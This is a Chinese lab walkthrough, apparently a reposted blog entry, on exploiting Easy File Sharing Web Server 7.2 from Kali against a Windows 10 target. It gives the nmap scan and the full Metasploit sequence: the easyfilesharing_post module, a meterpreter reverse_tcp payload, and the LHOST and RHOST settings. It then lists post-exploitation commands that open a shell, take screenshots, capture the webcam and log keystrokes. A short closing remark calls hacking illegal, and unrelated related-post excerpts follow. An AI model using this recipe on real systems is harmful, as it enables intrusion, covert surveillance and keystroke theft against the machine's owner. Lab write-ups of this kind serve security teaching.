easyfilewebsharing7.2漏洞利用

攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing

注意点:攻击者的虚拟机网络模式应选择桥接模式。


准备工作完成,可以开始内网渗透之旅了。

step-1

首先我们先用nmap扫描一下靶机开了哪些服务root@kali:~# nmap -sV 10.3.37.56

easyfilewebsharing7.2漏洞利用

namp扫描结果

我们可以看到80端口和443端口开放了,对应的是Easy File Sharing Web Server,满足EasyFileSharing漏洞攻击,进入下一步。

step-2

打开msf控制台,设置攻击参数

root@kali:~进入控制台,稍微等一下 msf > search EasyFileSharing #查找我们要用的漏洞

easyfilewebsharing7.2漏洞利用

搜索结果

我们选择最新的一个,2017-06-12的版本,并设置payload。

msf > use exploit/windows/http/easyfilesharing_post #使用这个漏洞 msf exploit(windows/http/easyfilesharing_post) > set payload windows/meterpreter/reverse_tcp #设置攻击payload

我们用show options看一下需要什么攻击参数

msf exploit(windows/http/easyfilesharing_post) > show options

easyfilewebsharing7.2漏洞利用

设置参数

根据Required属性看一下哪些是需要配置的,其中一些是配置好的,我们只需将其他的配置好就ok了。

msf exploit(windows/http/easyfilesharing_post) > set lhost 10.3.134.27 #设置本地ip msf exploit(windows/http/easyfilesharing_post) > set rhost 10.3.37.56 #设置远程ip

参数都配置好了,接着就是激动人心的exploit了。

msf exploit(windows/http/easyfilesharing_post) > exploit #攻击

easyfilewebsharing7.2漏洞利用

显示这个页面,说明你成功了

逐个输入以下命令,试试

meterpreter > getuid #获取靶机uid meterpreter > shell #进入靶机shell meterpreter > screenshot #靶机截屏 meterpreter > webcam_snap #用靶机摄像头拍照 meterpreter > webcam_stream #用靶机摄像头录像 meterpreter > keyscan_start #开启键盘记录 meterpreter > keyscan_dump #捕获键盘记录 meterpreter > keyscan_stop #停止键盘记录

我们来测试几个好玩的1st.捕捉靶机键盘记录

easyfilewebsharing7.2漏洞利用

捕捉到靶机键盘记录(hack hack)

2nd.捕捉靶机截屏

easyfilewebsharing7.2漏洞利用

捕捉靶机截屏

easyfilewebsharing7.2漏洞利用

捕捉靶机截屏

3rd.用靶机摄像头拍照

easyfilewebsharing7.2漏洞利用

利用靶机摄像头拍照

easyfilewebsharing7.2漏洞利用

靶机摄像头像素略渣,不过看看我们的公教区学习环境吧

小结:

我们做攻击实验都是在环境都配置好的情况下,现实生活中不会有这么好的肉鸡。而且网络攻击属于违法行为,人生路漫漫,且行且珍惜

本文【easyfilewebsharing7.2漏洞利用】由作者: 递归 提供,本站不拥有所有权,只提供储存服务,如有侵权,联系删除!
本文链接:https://www.cuoshuo.com/blog/4464.html

(0)
上一篇 2023-03-13 09:02:09
下一篇 2023-03-14 08:01:27

相关推荐

  • 计算机二级c语言考试题库,计算机二级自己咋练

    全国计算机等级考试(NationalComputer Rank Examination,简称NCRE)是经原国家教育委员会(现教育部)批准,由教育部考试中心主办,面向社会,用于考察应试人员计算机应用知识与技能的全国性计算机水平考试体系。 计算机二级包括了办公软件类:WPS Office高级应用与设计和MS Office高级应用与设计 程序设计类:C语言、Ja…

    2023-03-17
    700
  • remount命令_linux查看挂载信息命令

    挂载概述 在linux当中所有的存储设备如u盘、光盘、硬盘等,都必须挂载之后才能正常使用。 其实挂载可以理解为windows当中的分配盘符,只不过windows当中是以英文字母ABCD等作为盘符,而linux是拿系统目录作为盘符,当然linux当中也不叫盘符,而是称为挂载点,而把为分区或者光盘等存储设备分配一个挂载点的过程称为挂载。 在安装linux系统时设…

    2023-03-09
    1200
  • grep用法匹配两个条件(grep严格匹配)

    提醒:本文为合集文章,后续会持续更新! 阿铭在前面多次用到了grep命令,可见它的重要性。该命令的格式为:grep [-cinvABC] 'word' filename,其常用的选项如下所示。 -c:表示打印符合要求的行数。 -i:表示忽略大小写。 -n:表示输出符合要求的行及其行号。 -v:表示打印不符合要求的行。 -A:后面跟一个数字…

    2023-03-18
    000
  • 防止sql注入的方法有哪些_sql如何快速录入大量数据

    本文参考自owasp,重点是提供清晰,简单,可操作的指导,以防止应用程序中的SQL注入漏洞。不幸的是,SQL注入攻击很常见,这是由于两个因素: SQL注入漏洞的显着流行 目标的吸引力(即数据库通常包含应用程序的所有有趣/关键数据)。 发生了如此多的成功SQL注入攻击有点可耻,因为在代码中避免SQL注入漏洞非常简单。 当软件开发人员创建包含用户提供的输入的动态…

    2023-03-09
    900
  • stm32单片机和51单片机区别_stm32比51单片机的优点

    我们经常说51单片机和STM32单片机,到底他们有什么区别呢? 一:51单片机 01、简介 51单片机是对所有兼容Intel 8031指令系统的单片机的统称。该系列单片机的始祖是Intel的8004单片机,后来随着Flash rom 技术的发展,8004单片机取得了长足的进展,成为应用广泛的8位单片机之一,其代表型号是ATMEL公司的AT89系列,它广泛应用…

    2023-03-09
    1000
  • dubbo负载均衡策略使用场景(dubbo原理和机制)

    Dubbo 是一款高性能、透明化、轻量级的 Java RPC 框架,致力于提供高性能的RPC远程服务调用方案。 本篇,我重点详解 Dubbo 的原理机制 @mikechen的互联网架构 目录 Dubbo核心功能 Dubbo核心组件 Dubbo的架构设计 Dubbo调用流程 Dubbo核心功能 Dubbo主要提供了3大核心功能:面向接口的远程方法调用,智能容错…

    2023-03-18
    100
  • c语言编译器如何改成中文版_c语言编译器怎么改中文版

    一、 目前编译器的三种主流形式 做开发的,不论是阅读代码、编写程序总会涉及到编译器问题,我也经历过了TC、VC6、VC2010、CodeBlocks等等,使用过很多软件,最后慢慢的形成了自己的一套系统,希望对你也有帮助。 常见的C编译器主要的方式有以下三种: 1、基于文本编辑器改造的编译器 专业文本编辑器: (1)Visual Studio Code Vis…

    2023-03-10
    400
  • tcp连接的建立需要经过几次握手

    作者:morganhuang,腾讯 IEG 后台开发工程师 说到 TCP 协议,相信大家都比较熟悉了,对于 TCP 协议总能说个一二三来,但是 TCP 协议又是一个非常复杂的协议,其中有不少细节点让人头疼点。本文就是来说说这些头疼点的,浅谈一些 TCP 的疑难杂症。那么从哪说起呢?当然是从三次握手和四次挥手说起啦,可能大家都知道 TCP 是三次交互完成连接的…

    2023-03-11
    700
  • floor函数在python中的用法_python的set函数

    前言 Python是目前编程领域最受欢迎的语言。在本文中,我将总结Python面试中最常见的50个问题。每道题都提供参考答案,希望能够帮助你在2019年求职面试中脱颖而出,找到一份高薪工作。这些面试题涉及Python基础知识、Python编程、数据分析以及Python函数库等多个方面。 随着Python在企业中的应用越来越多,岗位需求越来越大,面试成为了搞定…

    2023-03-08
    500
  • hosts文件的用途和用法 如何绑定host

    1 什么是hosts文件? hosts是一个没有扩展名的系统文件,其基本作用就是将一些常用的网址域名与其对应的 IP 地址建立一个关联“ 数据库 ”。当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从hosts文件中寻找对应的 IP 地址,一旦找到,系统就会立即打开对应网页,如果没有找到,则系统会将网址提交 DNS 域名解析服务器进行 IP 地址的解…

    2023-03-20
    000

发表回复

登录后才能评论
返回顶部
错说博客上线啦!